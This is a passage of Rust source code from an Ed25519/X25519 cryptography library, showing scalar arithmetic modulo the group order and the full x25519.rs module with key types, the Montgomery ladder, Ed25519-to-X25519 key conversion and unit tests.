    carry6 = (s6 + (1 << 20)) >> 21;
    s7 += carry6;
    s6 -= carry6 << 21;
    carry8 = (s8 + (1 << 20)) >> 21;
    s9 += carry8;
    s8 -= carry8 << 21;
    carry10 = (s10 + (1 << 20)) >> 21;
    s11 += carry10;
    s10 -= carry10 << 21;
    let mut carry1: i64 = (s1 + (1 << 20)) >> 21;
    s2 += carry1;
    s1 -= carry1 << 21;
    let mut carry3: i64 = (s3 + (1 << 20)) >> 21;
    s4 += carry3;
    s3 -= carry3 << 21;
    let mut carry5: i64 = (s5 + (1 << 20)) >> 21;
    s6 += carry5;
    s5 -= carry5 << 21;
    carry7 = (s7 + (1 << 20)) >> 21;
    s8 += carry7;
    s7 -= carry7 << 21;
    carry9 = (s9 + (1 << 20)) >> 21;
    s10 += carry9;
    s9 -= carry9 << 21;
    carry11 = (s11 + (1 << 20)) >> 21;
    s12 += carry11;
    s11 -= carry11 << 21;
    // Fold the s12 overflow back once more...
    s0 += s12 * 666643;
    s1 += s12 * 470296;
    s2 += s12 * 654183;
    s3 -= s12 * 997805;
    s4 += s12 * 136657;
    s5 -= s12 * 683901;
    s12 = 0;
    carry0 = s0 >> 21;
    s1 += carry0;
    s0 -= carry0 << 21;
    carry1 = s1 >> 21;
    s2 += carry1;
    s1 -= carry1 << 21;
    carry2 = s2 >> 21;
    s3 += carry2;
    s2 -= carry2 << 21;
    carry3 = s3 >> 21;
    s4 += carry3;
    s3 -= carry3 << 21;
    carry4 = s4 >> 21;
    s5 += carry4;
    s4 -= carry4 << 21;
    carry5 = s5 >> 21;
    s6 += carry5;
    s5 -= carry5 << 21;
    carry6 = s6 >> 21;
    s7 += carry6;
    s6 -= carry6 << 21;
    carry7 = s7 >> 21;
    s8 += carry7;
    s7 -= carry7 << 21;
    carry8 = s8 >> 21;
    s9 += carry8;
    s8 -= carry8 << 21;
    carry9 = s9 >> 21;
    s10 += carry9;
    s9 -= carry9 << 21;
    carry10 = s10 >> 21;
    s11 += carry10;
    s10 -= carry10 << 21;
    carry11 = s11 >> 21;
    s12 += carry11;
    s11 -= carry11 << 21;
    // ...and a final time, after which no overflow can remain.
    s0 += s12 * 666643;
    s1 += s12 * 470296;
    s2 += s12 * 654183;
    s3 -= s12 * 997805;
    s4 += s12 * 136657;
    s5 -= s12 * 683901;
    carry0 = s0 >> 21;
    s1 += carry0;
    s0 -= carry0 << 21;
    carry1 = s1 >> 21;
    s2 += carry1;
    s1 -= carry1 << 21;
    carry2 = s2 >> 21;
    s3 += carry2;
    s2 -= carry2 << 21;
    carry3 = s3 >> 21;
    s4 += carry3;
    s3 -= carry3 << 21;
    carry4 = s4 >> 21;
    s5 += carry4;
    s4 -= carry4 << 21;
    carry5 = s5 >> 21;
    s6 += carry5;
    s5 -= carry5 << 21;
    carry6 = s6 >> 21;
    s7 += carry6;
    s6 -= carry6 << 21;
    carry7 = s7 >> 21;
    s8 += carry7;
    s7 -= carry7 << 21;
    carry8 = s8 >> 21;
    s9 += carry8;
    s8 -= carry8 << 21;
    carry9 = s9 >> 21;
    s10 += carry9;
    s9 -= carry9 << 21;
    carry10 = s10 >> 21;
    s11 += carry10;
    s10 -= carry10 << 21;
    // Repack the twelve 21-bit limbs into the 32 output bytes.
    s[0] = (s0 >> 0) as u8;
    s[1] = (s0 >> 8) as u8;
    s[2] = ((s0 >> 16) | (s1 << 5)) as u8;
    s[3] = (s1 >> 3) as u8;
    s[4] = (s1 >> 11) as u8;
    s[5] = ((s1 >> 19) | (s2 << 2)) as u8;
    s[6] = (s2 >> 6) as u8;
    s[7] = ((s2 >> 14) | (s3 << 7)) as u8;
    s[8] = (s3 >> 1) as u8;
    s[9] = (s3 >> 9) as u8;
    s[10] = ((s3 >> 17) | (s4 << 4)) as u8;
    s[11] = (s4 >> 4) as u8;
    s[12] = (s4 >> 12) as u8;
    s[13] = ((s4 >> 20) | (s5 << 1)) as u8;
    s[14] = (s5 >> 7) as u8;
    s[15] = ((s5 >> 15) | (s6 << 6)) as u8;
    s[16] = (s6 >> 2) as u8;
    s[17] = (s6 >> 10) as u8;
    s[18] = ((s6 >> 18) | (s7 << 3)) as u8;
    s[19] = (s7 >> 5) as u8;
    s[20] = (s7 >> 13) as u8;
    s[21] = (s8 >> 0) as u8;
    s[22] = (s8 >> 8) as u8;
    s[23] = ((s8 >> 16) | (s9 << 5)) as u8;
    s[24] = (s9 >> 3) as u8;
    s[25] = (s9 >> 11) as u8;
    s[26] = ((s9 >> 19) | (s10 << 2)) as u8;
    s[27] = (s10 >> 6) as u8;
    s[28] = ((s10 >> 14) | (s11 << 7)) as u8;
    s[29] = (s11 >> 1) as u8;
    s[30] = (s11 >> 9) as u8;
    s[31] = (s11 >> 17) as u8;
}
#[cfg(feature = "blind-keys")]
// Returns a * b modulo the group order (sc_muladd with c = 0).
pub fn sc_mul(a: &[u8], b: &[u8]) -> [u8; 32] {
    let mut s = [0u8; 32];
    sc_muladd(&mut s, a, b, &[0; 32]);
    s
}
#[cfg(feature = "blind-keys")]
// Returns s^2 modulo the group order.
pub fn sc_sq(s: &[u8]) -> [u8; 32] {
    sc_mul(s, s)
}
#[cfg(feature = "blind-keys")]
// Returns s^(2^n) * a modulo the group order: n successive squarings
// followed by a single multiplication (addition-chain building block).
pub fn sc_sqmul(s: &[u8], n: usize, a: &[u8]) -> [u8; 32] {
    let mut acc = [0u8; 32];
    acc.copy_from_slice(s);
    let squared = (0..n).fold(acc, |x, _| sc_sq(&x));
    sc_mul(&squared, a)
}
#[cfg(feature = "blind-keys")]
/// Computes the multiplicative inverse of `s` modulo the group order using
/// a fixed addition chain (no secret-dependent branches). Intermediate
/// names encode the binary exponent chunk they hold, e.g. `_1011` = s^0b1011.
pub fn sc_invert(s: &[u8; 32]) -> [u8; 32] {
    // Build the small odd powers needed by the chain.
    let _10 = sc_sq(s);
    let _11 = sc_mul(s, &_10);
    let _100 = sc_mul(s, &_11);
    let _1000 = sc_sq(&_100);
    let _1010 = sc_mul(&_10, &_1000);
    let _1011 = sc_mul(s, &_1010);
    let _10000 = sc_sq(&_1000);
    let _10110 = sc_sq(&_1011);
    let _100000 = sc_mul(&_1010, &_10110);
    let _100110 = sc_mul(&_10000, &_10110);
    let _1000000 = sc_sq(&_100000);
    let _1010000 = sc_mul(&_10000, &_1000000);
    let _1010011 = sc_mul(&_11, &_1010000);
    let _1100011 = sc_mul(&_10000, &_1010011);
    let _1100111 = sc_mul(&_100, &_1100011);
    let _1101011 = sc_mul(&_100, &_1100111);
    let _10010011 = sc_mul(&_1000000, &_1010011);
    let _10010111 = sc_mul(&_100, &_10010011);
    let _10111101 = sc_mul(&_100110, &_10010111);
    let _11010011 = sc_mul(&_10110, &_10111101);
    let _11100111 = sc_mul(&_1010000, &_10010111);
    let _11101011 = sc_mul(&_100, &_11100111);
    let _11110101 = sc_mul(&_1010, &_11101011);
    // Combine the windows with interleaved squarings (sc_sqmul) to reach
    // the full exponent.
    let mut recip = sc_mul(&_1011, &_11110101);
    recip = sc_sqmul(&recip, 126, &_1010011);
    recip = sc_sqmul(&recip, 9, &_10);
    recip = sc_mul(&recip, &_11110101);
    recip = sc_sqmul(&recip, 7, &_1100111);
    recip = sc_sqmul(&recip, 9, &_11110101);
    recip = sc_sqmul(&recip, 11, &_10111101);
    recip = sc_sqmul(&recip, 8, &_11100111);
    recip = sc_sqmul(&recip, 9, &_1101011);
    recip = sc_sqmul(&recip, 6, &_1011);
    recip = sc_sqmul(&recip, 14, &_10010011);
    recip = sc_sqmul(&recip, 10, &_1100011);
    recip = sc_sqmul(&recip, 9, &_10010111);
    recip = sc_sqmul(&recip, 10, &_11110101);
    recip = sc_sqmul(&recip, 8, &_11010011);
    recip = sc_sqmul(&recip, 8, &_11101011);
    recip
}
pub fn sc_muladd(s: &mut [u8], a: &[u8], b: &[u8], c: &[u8]) {
let a0 = 2097151 & load_3i(&a[0..3]);
let a1 = 2097151 & (load_4i(&a[2..6]) >> 5);
let a2 = 2097151 & (load_3i(&a[5..8]) >> 2);
let a3 = 2097151 & (load_4i(&a[7..11]) >> 7);
let a4 = 2097151 & (load_4i(&a[10..14]) >> 4);
let a5 = 2097151 & (load_3i(&a[13..16]) >> 1);
let a6 = 2097151 & (load_4i(&a[15..19]) >> 6);
let a7 = 2097151 & (load_3i(&a[18..21]) >> 3);
let a8 = 2097151 & load_3i(&a[21..24]);
let a9 = 2097151 & (load_4i(&a[23..27]) >> 5);
let a10 = 2097151 & (load_3i(&a[26..29]) >> 2);
let a11 = load_4i(&a[28..32]) >> 7;
let b0 = 2097151 & load_3i(&b[0..3]);
let b1 = 2097151 & (load_4i(&b[2..6]) >> 5);
let b2 = 2097151 & (load_3i(&b[5..8]) >> 2);
let b3 = 2097151 & (load_4i(&b[7..11]) >> 7);
let b4 = 2097151 & (load_4i(&b[10..14]) >> 4);
let b5 = 2097151 & (load_3i(&b[13..16]) >> 1);
let b6 = 2097151 & (load_4i(&b[15..19]) >> 6);
let b7 = 2097151 & (load_3i(&b[18..21]) >> 3);
let b8 = 2097151 & load_3i(&b[21..24]);
let b9 = 2097151 & (load_4i(&b[23..27]) >> 5);
let b10 = 2097151 & (load_3i(&b[26..29]) >> 2);
let b11 = load_4i(&b[28..32]) >> 7;
let c0 = 2097151 & load_3i(&c[0..3]);
let c1 = 2097151 & (load_4i(&c[2..6]) >> 5);
let c2 = 2097151 & (load_3i(&c[5..8]) >> 2);
let c3 = 2097151 & (load_4i(&c[7..11]) >> 7);
let c4 = 2097151 & (load_4i(&c[10..14]) >> 4);
let c5 = 2097151 & (load_3i(&c[13..16]) >> 1);
let c6 = 2097151 & (load_4i(&c[15..19]) >> 6);
let c7 = 2097151 & (load_3i(&c[18..21]) >> 3);
let c8 = 2097151 & load_3i(&c[21..24]);
let c9 = 2097151 & (load_4i(&c[23..27]) >> 5);
let c10 = 2097151 & (load_3i(&c[26..29]) >> 2);
let c11 = load_4i(&c[28..32]) >> 7;
let mut s0: i64 = c0 + a0 * b0;
let mut s1: i64 = c1 + a0 * b1 + a1 * b0;
let mut s2: i64 = c2 + a0 * b2 + a1 * b1 + a2 * b0;
let mut s3: i64 = c3 + a0 * b3 + a1 * b2 + a2 * b1 + a3 * b0;
let mut s4: i64 = c4 + a0 * b4 + a1 * b3 + a2 * b2 + a3 * b1 + a4 * b0;
let mut s5: i64 = c5 + a0 * b5 + a1 * b4 + a2 * b3 + a3 * b2 + a4 * b1 + a5 * b0;
let mut s6: i64 = c6 + a0 * b6 + a1 * b5 + a2 * b4 + a3 * b3 + a4 * b2 + a5 * b1 + a6 * b0;
let mut s7: i64 =
c7 + a0 * b7 + a1 * b6 + a2 * b5 + a3 * b4 + a4 * b3 + a5 * b2 + a6 * b1 + a7 * b0;
let mut s8: i64 = c8
+ a0 * b8
+ a1 * b7
+ a2 * b6
+ a3 * b5
+ a4 * b4
+ a5 * b3
+ a6 * b2
+ a7 * b1
+ a8 * b0;
let mut s9: i64 = c9
+ a0 * b9
+ a1 * b8
+ a2 * b7
+ a3 * b6
+ a4 * b5
+ a5 * b4
+ a6 * b3
+ a7 * b2
+ a8 * b1
+ a9 * b0;
let mut s10: i64 = c10
+ a0 * b10
+ a1 * b9
+ a2 * b8
+ a3 * b7
+ a4 * b6
+ a5 * b5
+ a6 * b4
+ a7 * b3
+ a8 * b2
+ a9 * b1
+ a10 * b0;
let mut s11: i64 = c11
+ a0 * b11
+ a1 * b10
+ a2 * b9
+ a3 * b8
+ a4 * b7
+ a5 * b6
+ a6 * b5
+ a7 * b4
+ a8 * b3
+ a9 * b2
+ a10 * b1
+ a11 * b0;
let mut s12: i64 = a1 * b11
+ a2 * b10
+ a3 * b9
+ a4 * b8
+ a5 * b7
+ a6 * b6
+ a7 * b5
+ a8 * b4
+ a9 * b3
+ a10 * b2
+ a11 * b1;
let mut s13: i64 = a2 * b11
+ a3 * b10
+ a4 * b9
+ a5 * b8
+ a6 * b7
+ a7 * b6
+ a8 * b5
+ a9 * b4
+ a10 * b3
+ a11 * b2;
let mut s14: i64 =
a3 * b11 + a4 * b10 + a5 * b9 + a6 * b8 + a7 * b7 + a8 * b6 + a9 * b5 + a10 * b4 + a11 * b3;
let mut s15: i64 =
a4 * b11 + a5 * b10 + a6 * b9 + a7 * b8 + a8 * b7 + a9 * b6 + a10 * b5 + a11 * b4;
let mut s16: i64 = a5 * b11 + a6 * b10 + a7 * b9 + a8 * b8 + a9 * b7 + a10 * b6 + a11 * b5;
let mut s17: i64 = a6 * b11 + a7 * b10 + a8 * b9 + a9 * b8 + a10 * b7 + a11 * b6;
let mut s18: i64 = a7 * b11 + a8 * b10 + a9 * b9 + a10 * b8 + a11 * b7;
let mut s19: i64 = a8 * b11 + a9 * b10 + a10 * b9 + a11 * b8;
let mut s20: i64 = a9 * b11 + a10 * b10 + a11 * b9;
let mut s21: i64 = a10 * b11 + a11 * b10;
let mut s22: i64 = a11 * b11;
let mut s23: i64 = 0;
let mut carry0: i64 = (s0 + (1 << 20)) >> 21;
s1 += carry0;
s0 -= carry0 << 21;
let mut carry2: i64 = (s2 + (1 << 20)) >> 21;
s3 += carry2;
s2 -= carry2 << 21;
let mut carry4: i64 = (s4 + (1 << 20)) >> 21;
s5 += carry4;
s4 -= carry4 << 21;
let mut carry6: i64 = (s6 + (1 << 20)) >> 21;
s7 += carry6;
s6 -= carry6 << 21;
let mut carry8: i64 = (s8 + (1 << 20)) >> 21;
s9 += carry8;
s8 -= carry8 << 21;
let mut carry10: i64 = (s10 + (1 << 20)) >> 21;
s11 += carry10;
s10 -= carry10 << 21;
let mut carry12: i64 = (s12 + (1 << 20)) >> 21;
s13 += carry12;
s12 -= carry12 << 21;
let mut carry14: i64 = (s14 + (1 << 20)) >> 21;
s15 += carry14;
s14 -= carry14 << 21;
let mut carry16: i64 = (s16 + (1 << 20)) >> 21;
s17 += carry16;
s16 -= carry16 << 21;
let carry18: i64 = (s18 + (1 << 20)) >> 21;
s19 += carry18;
s18 -= carry18 << 21;
let carry20: i64 = (s20 + (1 << 20)) >> 21;
s21 += carry20;
s20 -= carry20 << 21;
let carry22: i64 = (s22 + (1 << 20)) >> 21;
s23 += carry22;
s22 -= carry22 << 21;
let mut carry1: i64 = (s1 + (1 << 20)) >> 21;
s2 += carry1;
s1 -= carry1 << 21;
let mut carry3: i64 = (s3 + (1 << 20)) >> 21;
s4 += carry3;
s3 -= carry3 << 21;
let mut carry5: i64 = (s5 + (1 << 20)) >> 21;
s6 += carry5;
s5 -= carry5 << 21;
let mut carry7: i64 = (s7 + (1 << 20)) >> 21;
s8 += carry7;
s7 -= carry7 << 21;
let mut carry9: i64 = (s9 + (1 << 20)) >> 21;
s10 += carry9;
s9 -= carry9 << 21;
let mut carry11: i64 = (s11 + (1 << 20)) >> 21;
s12 += carry11;
s11 -= carry11 << 21;
let mut carry13: i64 = (s13 + (1 << 20)) >> 21;
s14 += carry13;
s13 -= carry13 << 21;
let mut carry15: i64 = (s15 + (1 << 20)) >> 21;
s16 += carry15;
s15 -= carry15 << 21;
let carry17: i64 = (s17 + (1 << 20)) >> 21;
s18 += carry17;
s17 -= carry17 << 21;
let carry19: i64 = (s19 + (1 << 20)) >> 21;
s20 += carry19;
s19 -= carry19 << 21;
let carry21: i64 = (s21 + (1 << 20)) >> 21;
s22 += carry21;
s21 -= carry21 << 21;
s11 += s23 * 666643;
s12 += s23 * 470296;
s13 += s23 * 654183;
s14 -= s23 * 997805;
s15 += s23 * 136657;
s16 -= s23 * 683901;
s10 += s22 * 666643;
s11 += s22 * 470296;
s12 += s22 * 654183;
s13 -= s22 * 997805;
s14 += s22 * 136657;
s15 -= s22 * 683901;
s9 += s21 * 666643;
s10 += s21 * 470296;
s11 += s21 * 654183;
s12 -= s21 * 997805;
s13 += s21 * 136657;
s14 -= s21 * 683901;
s8 += s20 * 666643;
s9 += s20 * 470296;
s10 += s20 * 654183;
s11 -= s20 * 997805;
s12 += s20 * 136657;
s13 -= s20 * 683901;
s7 += s19 * 666643;
s8 += s19 * 470296;
s9 += s19 * 654183;
s10 -= s19 * 997805;
s11 += s19 * 136657;
s12 -= s19 * 683901;
s6 += s18 * 666643;
s7 += s18 * 470296;
s8 += s18 * 654183;
s9 -= s18 * 997805;
s10 += s18 * 136657;
s11 -= s18 * 683901;
carry6 = (s6 + (1 << 20)) >> 21;
s7 += carry6;
s6 -= carry6 << 21;
carry8 = (s8 + (1 << 20)) >> 21;
s9 += carry8;
s8 -= carry8 << 21;
carry10 = (s10 + (1 << 20)) >> 21;
s11 += carry10;
s10 -= carry10 << 21;
carry12 = (s12 + (1 << 20)) >> 21;
s13 += carry12;
s12 -= carry12 << 21;
carry14 = (s14 + (1 << 20)) >> 21;
s15 += carry14;
s14 -= carry14 << 21;
carry16 = (s16 + (1 << 20)) >> 21;
s17 += carry16;
s16 -= carry16 << 21;
carry7 = (s7 + (1 << 20)) >> 21;
s8 += carry7;
s7 -= carry7 << 21;
carry9 = (s9 + (1 << 20)) >> 21;
s10 += carry9;
s9 -= carry9 << 21;
carry11 = (s11 + (1 << 20)) >> 21;
s12 += carry11;
s11 -= carry11 << 21;
carry13 = (s13 + (1 << 20)) >> 21;
s14 += carry13;
s13 -= carry13 << 21;
carry15 = (s15 + (1 << 20)) >> 21;
s16 += carry15;
s15 -= carry15 << 21;
s5 += s17 * 666643;
s6 += s17 * 470296;
s7 += s17 * 654183;
s8 -= s17 * 997805;
s9 += s17 * 136657;
s10 -= s17 * 683901;
s4 += s16 * 666643;
s5 += s16 * 470296;
s6 += s16 * 654183;
s7 -= s16 * 997805;
s8 += s16 * 136657;
s9 -= s16 * 683901;
s3 += s15 * 666643;
s4 += s15 * 470296;
s5 += s15 * 654183;
s6 -= s15 * 997805;
s7 += s15 * 136657;
s8 -= s15 * 683901;
s2 += s14 * 666643;
s3 += s14 * 470296;
s4 += s14 * 654183;
s5 -= s14 * 997805;
s6 += s14 * 136657;
s7 -= s14 * 683901;
s1 += s13 * 666643;
s2 += s13 * 470296;
s3 += s13 * 654183;
s4 -= s13 * 997805;
s5 += s13 * 136657;
s6 -= s13 * 683901;
s0 += s12 * 666643;
s1 += s12 * 470296;
s2 += s12 * 654183;
s3 -= s12 * 997805;
s4 += s12 * 136657;
s5 -= s12 * 683901;
s12 = 0;
carry0 = (s0 + (1 << 20)) >> 21;
s1 += carry0;
s0 -= carry0 << 21;
carry2 = (s2 + (1 << 20)) >> 21;
s3 += carry2;
s2 -= carry2 << 21;
carry4 = (s4 + (1 << 20)) >> 21;
s5 += carry4;
s4 -= carry4 << 21;
carry6 = (s6 + (1 << 20)) >> 21;
s7 += carry6;
s6 -= carry6 << 21;
carry8 = (s8 + (1 << 20)) >> 21;
s9 += carry8;
s8 -= carry8 << 21;
carry10 = (s10 + (1 << 20)) >> 21;
s11 += carry10;
s10 -= carry10 << 21;
carry1 = (s1 + (1 << 20)) >> 21;
s2 += carry1;
s1 -= carry1 << 21;
carry3 = (s3 + (1 << 20)) >> 21;
s4 += carry3;
s3 -= carry3 << 21;
carry5 = (s5 + (1 << 20)) >> 21;
s6 += carry5;
s5 -= carry5 << 21;
carry7 = (s7 + (1 << 20)) >> 21;
s8 += carry7;
s7 -= carry7 << 21;
carry9 = (s9 + (1 << 20)) >> 21;
s10 += carry9;
s9 -= carry9 << 21;
carry11 = (s11 + (1 << 20)) >> 21;
s12 += carry11;
s11 -= carry11 << 21;
s0 += s12 * 666643;
s1 += s12 * 470296;
s2 += s12 * 654183;
s3 -= s12 * 997805;
s4 += s12 * 136657;
s5 -= s12 * 683901;
s12 = 0;
carry0 = s0 >> 21;
s1 += carry0;
s0 -= carry0 << 21;
carry1 = s1 >> 21;
s2 += carry1;
s1 -= carry1 << 21;
carry2 = s2 >> 21;
s3 += carry2;
s2 -= carry2 << 21;
carry3 = s3 >> 21;
s4 += carry3;
s3 -= carry3 << 21;
carry4 = s4 >> 21;
s5 += carry4;
s4 -= carry4 << 21;
carry5 = s5 >> 21;
s6 += carry5;
s5 -= carry5 << 21;
carry6 = s6 >> 21;
s7 += carry6;
s6 -= carry6 << 21;
carry7 = s7 >> 21;
s8 += carry7;
| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | true |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/x25519.rs | src/x25519.rs | use core::ops::{Deref, DerefMut};
use super::common::*;
use super::error::Error;
use super::field25519::*;
const POINT_BYTES: usize = 32;
/// Non-uniform output of a scalar multiplication.
/// This represents a point on the curve, and should not be used directly as a
/// cipher key.
#[derive(Clone, Debug, Eq, PartialEq, Hash)]
pub struct DHOutput([u8; DHOutput::BYTES]);
impl DHOutput {
pub const BYTES: usize = 32;
}
impl Deref for DHOutput {
type Target = [u8; DHOutput::BYTES];
/// Returns the output of the scalar multiplication as bytes.
/// The output is not uniform, and should be hashed before use.
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for DHOutput {
/// Returns the output of the scalar multiplication as bytes.
/// The output is not uniform, and should be hashed before use.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl From<DHOutput> for PublicKey {
fn from(dh: DHOutput) -> Self {
PublicKey(dh.0)
}
}
impl From<DHOutput> for SecretKey {
fn from(dh: DHOutput) -> Self {
SecretKey(dh.0)
}
}
impl Drop for DHOutput {
fn drop(&mut self) {
Mem::wipe(&mut self.0)
}
}
/// A public key.
#[derive(Copy, Clone, Debug, Eq, PartialEq, Hash)]
pub struct PublicKey([u8; POINT_BYTES]);
impl PublicKey {
/// Number of raw bytes in a public key.
pub const BYTES: usize = POINT_BYTES;
/// Creates a public key from raw bytes.
pub fn new(pk: [u8; PublicKey::BYTES]) -> Self {
PublicKey(pk)
}
/// Creates a public key from a slice.
pub fn from_slice(pk: &[u8]) -> Result<Self, Error> {
let mut pk_ = [0u8; PublicKey::BYTES];
if pk.len() != pk_.len() {
return Err(Error::InvalidPublicKey);
}
Fe::reject_noncanonical(pk)?;
pk_.copy_from_slice(pk);
Ok(PublicKey::new(pk_))
}
/// Multiply a point by the cofactor, returning an error if the element is
/// in a small-order group.
pub fn clear_cofactor(&self) -> Result<[u8; PublicKey::BYTES], Error> {
let cofactor = [
8u8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0,
];
self.ladder(&cofactor, 4)
}
/// Multiply the point represented by the public key by the scalar after
/// clamping it
pub fn dh(&self, sk: &SecretKey) -> Result<DHOutput, Error> {
let sk = sk.clamped();
Ok(DHOutput(self.ladder(&sk.0, 255)?))
}
/// Multiply the point represented by the public key by the scalar WITHOUT
/// CLAMPING
pub fn unclamped_mul(&self, sk: &SecretKey) -> Result<DHOutput, Error> {
self.clear_cofactor()?;
Ok(DHOutput(self.ladder(&sk.0, 256)?))
}
fn ladder(&self, s: &[u8], bits: usize) -> Result<[u8; POINT_BYTES], Error> {
let x1 = Fe::from_bytes(&self.0);
let mut x2 = FE_ONE;
let mut z2 = FE_ZERO;
let mut x3 = x1;
let mut z3 = FE_ONE;
let mut swap: u8 = 0;
let mut pos = bits - 1;
loop {
let bit = (s[pos >> 3] >> (pos & 7)) & 1;
swap ^= bit;
Fe::cswap2(&mut x2, &mut x3, &mut z2, &mut z3, swap);
swap = bit;
let a = x2 + z2;
let b = x2 - z2;
let aa = a.square();
let bb = b.square();
x2 = aa * bb;
let e = aa - bb;
let da = (x3 - z3) * a;
let cb = (x3 + z3) * b;
x3 = (da + cb).square();
z3 = x1 * ((da - cb).square());
z2 = e * (bb + (e.mul32(121666)));
if pos == 0 {
break;
}
pos -= 1;
}
Fe::cswap2(&mut x2, &mut x3, &mut z2, &mut z3, swap);
z2 = z2.invert();
x2 = x2 * z2;
if x2.is_zero() {
return Err(Error::WeakPublicKey);
}
Ok(x2.to_bytes())
}
/// The Curve25519 base point
#[inline]
pub fn base_point() -> PublicKey {
PublicKey(FE_CURVE25519_BASEPOINT.to_bytes())
}
}
impl Deref for PublicKey {
type Target = [u8; PublicKey::BYTES];
/// Returns a public key as bytes.
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for PublicKey {
/// Returns a public key as mutable bytes.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
/// A secret key.
#[derive(Clone, Debug, Eq, PartialEq, Hash)]
pub struct SecretKey([u8; SecretKey::BYTES]);
impl SecretKey {
/// Number of bytes in a secret key.
pub const BYTES: usize = 32;
/// Creates a secret key from raw bytes.
pub fn new(sk: [u8; SecretKey::BYTES]) -> Self {
SecretKey(sk)
}
/// Creates a secret key from a slice.
pub fn from_slice(sk: &[u8]) -> Result<Self, Error> {
let mut sk_ = [0u8; SecretKey::BYTES];
if sk.len() != sk_.len() {
return Err(Error::InvalidSecretKey);
}
sk_.copy_from_slice(sk);
Ok(SecretKey::new(sk_))
}
/// Perform the X25519 clamping magic
pub fn clamped(&self) -> SecretKey {
let mut clamped = self.clone();
clamped[0] &= 248;
clamped[31] &= 63;
clamped[31] |= 64;
clamped
}
/// Recover the public key
pub fn recover_public_key(&self) -> Result<PublicKey, Error> {
let sk = self.clamped();
Ok(PublicKey(PublicKey::base_point().ladder(&sk.0, 255)?))
}
/// Returns `Ok(())` if the given public key is the public counterpart of
/// this secret key.
/// Returns `Err(Error::InvalidPublicKey)` otherwise.
pub fn validate_public_key(&self, pk: &PublicKey) -> Result<(), Error> {
let recovered_pk = self.recover_public_key()?;
if recovered_pk != *pk {
return Err(Error::InvalidPublicKey);
}
Ok(())
}
}
impl Drop for SecretKey {
fn drop(&mut self) {
Mem::wipe(&mut self.0)
}
}
impl Deref for SecretKey {
type Target = [u8; SecretKey::BYTES];
/// Returns a secret key as bytes.
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for SecretKey {
/// Returns a secret key as mutable bytes.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
/// A key pair.
#[derive(Clone, Debug, Eq, PartialEq, Hash)]
pub struct KeyPair {
/// Public key part of the key pair.
pub pk: PublicKey,
/// Secret key part of the key pair.
pub sk: SecretKey,
}
impl KeyPair {
/// Generates a new key pair.
#[cfg(feature = "random")]
pub fn generate() -> KeyPair {
let mut sk = [0u8; SecretKey::BYTES];
getrandom::fill(&mut sk).expect("getrandom");
if Fe::from_bytes(&sk).is_zero() {
panic!("All-zero secret key");
}
let sk = SecretKey(sk);
let pk = sk
.recover_public_key()
.expect("generated public key is weak");
KeyPair { pk, sk }
}
/// Check that the public key is valid for the secret key.
pub fn validate(&self) -> Result<(), Error> {
self.sk.validate_public_key(&self.pk)
}
}
#[cfg(not(feature = "disable-signatures"))]
mod from_ed25519 {
use super::super::{
edwards25519, sha512, KeyPair as EdKeyPair, PublicKey as EdPublicKey,
SecretKey as EdSecretKey,
};
use super::*;
impl SecretKey {
/// Convert an Ed25519 secret key to a X25519 secret key.
pub fn from_ed25519(edsk: &EdSecretKey) -> Result<SecretKey, Error> {
let seed = edsk.seed();
let az: [u8; 64] = {
let mut hash_output = sha512::Hash::hash(*seed);
hash_output[0] &= 248;
hash_output[31] &= 63;
hash_output[31] |= 64;
hash_output
};
SecretKey::from_slice(&az[..32])
}
}
impl PublicKey {
/// Convert an Ed25519 public key to a X25519 public key.
pub fn from_ed25519(edpk: &EdPublicKey) -> Result<PublicKey, Error> {
let pk = PublicKey::from_slice(
&edwards25519::ge_to_x25519_vartime(edpk).ok_or(Error::InvalidPublicKey)?,
)?;
pk.clear_cofactor()?;
Ok(pk)
}
}
impl KeyPair {
/// Convert an Ed25519 key pair to a X25519 key pair.
pub fn from_ed25519(edkp: &EdKeyPair) -> Result<KeyPair, Error> {
let pk = PublicKey::from_ed25519(&edkp.pk)?;
let sk = SecretKey::from_ed25519(&edkp.sk)?;
Ok(KeyPair { pk, sk })
}
}
}
#[cfg(not(feature = "disable-signatures"))]
#[allow(unused)]
pub use from_ed25519::*;
#[test]
fn test_x25519() {
let sk_1 = SecretKey::from_slice(&[
1u8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0,
])
.unwrap();
let output = PublicKey::base_point().unclamped_mul(&sk_1).unwrap();
assert_eq!(PublicKey::from(output), PublicKey::base_point());
let kp_a = KeyPair::generate();
let kp_b = KeyPair::generate();
let output_a = kp_b.pk.dh(&kp_a.sk).unwrap();
let output_b = kp_a.pk.dh(&kp_b.sk).unwrap();
assert_eq!(output_a, output_b);
}
#[cfg(not(feature = "disable-signatures"))]
#[test]
fn test_x25519_map() {
use super::KeyPair as EdKeyPair;
let edkp_a = EdKeyPair::generate();
let edkp_b = EdKeyPair::generate();
let kp_a = KeyPair::from_ed25519(&edkp_a).unwrap();
let kp_b = KeyPair::from_ed25519(&edkp_b).unwrap();
let output_a = kp_b.pk.dh(&kp_a.sk).unwrap();
let output_b = kp_a.pk.dh(&kp_b.sk).unwrap();
assert_eq!(output_a, output_b);
}
#[test]
#[cfg(all(not(feature = "disable-signatures"), feature = "random"))]
fn test_x25519_invalid_keypair() {
let kp1 = KeyPair::generate();
let kp2 = KeyPair::generate();
assert_eq!(
kp1.sk.validate_public_key(&kp2.pk).unwrap_err(),
Error::InvalidPublicKey
);
assert_eq!(
kp2.sk.validate_public_key(&kp1.pk).unwrap_err(),
Error::InvalidPublicKey
);
assert!(kp1.sk.validate_public_key(&kp1.pk).is_ok());
assert!(kp2.sk.validate_public_key(&kp2.pk).is_ok());
assert!(kp1.validate().is_ok());
}
